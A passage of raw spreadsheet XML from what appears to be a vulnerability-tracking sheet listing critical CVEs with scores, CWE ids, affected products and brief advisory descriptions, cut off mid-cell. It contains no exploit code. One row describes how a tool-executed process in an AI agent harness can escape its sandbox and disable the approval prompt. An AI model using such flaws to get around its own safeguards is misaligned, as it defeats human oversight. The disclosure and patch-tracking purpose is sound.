t="inlineStr"><is><t>NVD</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S59" s="5" t="inlineStr"><is><t>Command Center API contained an authentication bypass issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Command Center.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77089</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-77092</t></is></c><c r="D60" s="5" t="n"><v>9.800000000000001</v></c><c r="E60" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.002</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L60" s="5" t="inlineStr" /><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S60" s="5" t="inlineStr"><is><t>Content Extractor contained a deserialization of untrusted data issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update Content Extractor.</t></is></c><c r="T60" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77092</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-77098</t></is></c><c r="D61" s="5" t="n"><v>9.800000000000001</v></c><c r="E61" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.003</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L61" s="5" t="inlineStr" /><c r="M61" s="5" t="inlineStr" /><c r="N61" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O61" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P61" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q61" s="5" t="inlineStr" /><c r="R61" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S61" s="5" t="inlineStr"><is><t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-77493</t></is></c><c r="D62" s="5" t="n"><v>9.800000000000001</v></c><c r="E62" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.01</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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2" s="5" t="inlineStr" /><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O62" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P62" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q62" s="5" t="inlineStr" /><c r="R62" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S62" s="5" t="inlineStr"><is><t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-78445</t></is></c><c r="D63" s="5" t="n"><v>9.800000000000001</v></c><c r="E63" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.008999999999999999</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L63" s="5" t="inlineStr" /><c r="M63" s="5" t="inlineStr" /><c r="N63" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O63" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P63" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q63" s="5" t="inlineStr" /><c r="R63" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S63" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-78509</t></is></c><c r="D64" s="5" t="n"><v>9.800000000000001</v></c><c r="E64" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.01</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L64" s="5" t="inlineStr" /><c r="M64" s="5" t="inlineStr" /><c r="N64" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P64" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q64" s="5" t="inlineStr" /><c r="R64" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S64" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-78510</t></is></c><c r="D65" s="5" t="n"><v>9.800000000000001</v></c><c r="E65" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.01</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L65" s="5" t="inlineStr" /><c r="M65" s="5" t="inlineStr" /><c r="N65" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O65" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P65" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q65" s="5" t="inlineStr" /><c r="R65" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S65" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T65" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t></is></c></row><row r="66"><c r="A66" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B66" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C66" s="5" t="inlineStr"><is><t>CVE-2026-79569</t></is></c><c r="D66" s="5" t="n"><v>9.800000000000001</v></c><c r="E66" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F66" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G66" s="5" t="inlineStr" /><c r="H66" s="5" t="n"><v>0.004</v></c><c r="I66" s="5" t="inlineStr" /><c r="J66" s="5" t="inlineStr" /><c r="K66" s="5" t="inlineStr" /><c r="L66" s="5" t="inlineStr" /><c r="M66" s="5" t="inlineStr" /><c r="N66" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O66" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P66" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q66" s="5" t="inlineStr" /><c r="R66" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S66" s="5" t="inlineStr"><is><t>Movie_Recommend v1.0.0 was discovered to contain a SQL injection vulnerability in the sort parameter at /loadingmore. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T66" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79569</t></is></c></row><row r="67"><c r="A67" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B67" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C67" s="5" t="inlineStr"><is><t>CVE-2026-79570</t></is></c><c r="D67" s="5" t="n"><v>9.800000000000001</v></c><c r="E67" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F67" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G67" s="5" t="inlineStr" /><c r="H67" s="5" t="n"><v>0.003</v></c><c r="I67" s="5" t="inlineStr" /><c r="J67" s="5" t="inlineStr" /><c r="K67" s="5" t="inlineStr" /><c r="L67" s="5" t="inlineStr" /><c r="M67" s="5" t="inlineStr" /><c r="N67" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O67" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P67" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q67" s="5" t="inlineStr" /><c r="R67" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S67" s="5" t="inlineStr"><is><t>mfish-nocode-pro v1.0.0 was discovered to contain a SQL injection vulnerability in the tableName parameter at /sys/dbConnect/data. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T67" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79570</t></is></c></row><row r="68"><c r="A68" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B68" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C68" s="5" t="inlineStr"><is><t>CVE-2026-79574</t></is></c><c r="D68" s="5" t="n"><v>9.800000000000001</v></c><c r="E68" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F68" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G68" s="5" t="inlineStr" /><c r="H68" s="5" t="n"><v>0.005</v></c><c r="I68" s="5" t="inlineStr" /><c r="J68" s="5" t="inlineStr" /><c r="K68" s="5" t="inlineStr" /><c r="L68" s="5" t="inlineStr" /><c r="M68" s="5" t="inlineStr" /><c r="N68" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O68" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P68" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q68" s="5" t="inlineStr" /><c r="R68" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S68" s="5" t="inlineStr"><is><t>An issue in the gateway server of mpush v0.8.1 allows attackers to execute arbitrary code via sending a crafted broadcast message.</t></is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79574</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-79576</t></is></c><c r="D69" s="5" t="n"><v>9.800000000000001</v></c><c r="E69" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.003</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr" /><c r="M69" s="5" t="inlineStr" /><c r="N69" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S69" s="5" t="inlineStr"><is><t>An issue in the Single-Sign On (SSO) component of Digital-Infrastructure v9.6.7 allows attackers to authenticate as any user, including the Admin, without a password.</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79576</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-79577</t></is></c><c r="D70" s="5" t="n"><v>9.800000000000001</v></c><c r="E70" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.003</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr" /><c r="L70" s="5" t="inlineStr" /><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S70" s="5" t="inlineStr"><is><t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t></is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-65669</t></is></c><c r="D71" s="5" t="n"><v>9.6</v></c><c r="E71" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.007</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr" /><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr" /><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="S71" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-81376</t></is></c><c r="D72" s="5" t="n"><v>9.6</v></c><c r="E72" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.006</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L72" s="5" t="inlineStr" /><c r="M72" s="5" t="inlineStr" /><c r="N72" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr"><is><t>CWE-1023, CWE-693</t></is></c><c r="S72" s="5" t="inlineStr"><is><t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D73" s="5" t="n"><v>9.4</v></c><c r="E73" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr"><is><t>npm:@sap/cds-mtxs</t></is></c><c r="M73" s="5" t="inlineStr"><is><t>1.18.4, 2.7.7, 3.9.7, 4.0.3</t></is></c><c r="N73" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S73" s="5" t="inlineStr"><is><t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t></is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-82533</t></is></c><c r="D74" s="5" t="n"><v>9.4</v></c><c r="E74" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.006</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr" /><c r="M74" s="5" t="inlineStr" /><c r="N74" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S74" s="5" t="inlineStr"><is><t>DeepSeek Harness before 0.1.2-alpha.1 contains an authentication bypass vulnerability that grants unauthenticated access to its local HTTP agent-control API by accepting a client-supplied loopback Host header in place of validating the actual TCP connection origin. On the default configuration, a confined tool-executed process can reach the loopback API without any port exposure and use it to escape its own OS sandbox, escalate to unconfined execution, and disable the approval prompt. When the port is externally reachable via tunnel, SSH forward, or reverse proxy, a remote attacker can exploit the same flaw to create sessions, execute arbitrary commands, and exfiltrate stored conversation transcripts without credentials.</t></is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-62645</t></is></c><c r="D75" s="5" t="n"><v>9.300000000000001</v></c><c r="E75" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.003</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr" /><c r="M75" s="5" t="inlineStr" /><c r="N75" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S75" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t></is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-62647</t></is></c><c r="D76" s="5" t="n"><v>9.300000000000001</v></c><c r="E76" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.003</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr" /><c r="L76" s="5" t="inlineStr" /><c r="M76" s="5" t="inlineStr" /><c r="N76" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S76" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t></is></c><c r="T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-69356</t></is></c><c r="D77" s="5" t="n"><v>9.300000000000001</v></c><c r="E77" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.007</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr" /><c r="L77" s="5" t="inlineStr" /><c r="M77" s="5" t="inlineStr" /><c r="N77" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S77" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-76200</t></is></c><c r="D78" s="5" t="n"><v>9.300000000000001</v></c><c r="E78" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.005</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L78" s="5" t="inlineStr" /><c r="M78" s="5" t="inlineStr" /><c r="N78" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S78" s="5" t="inlineStr"><is><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is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-76201</t></is></c><c r="D79" s="5" t="n"><v>9.300000000000001</v></c><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.005</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L79" s="5" t="inlineStr" /><c r="M79" s="5" t="inlineStr" /><c r="N79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S79" s="5" t="inlineStr"><is><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is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-78997</t></is></c><c r="D80" s="5" t="n"><v>9.300000000000001</v></c><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr" /><c r="M80" s="5" t="inlineStr" /><c r="N80" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S80" s="5" t="inlineStr"><is><t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a 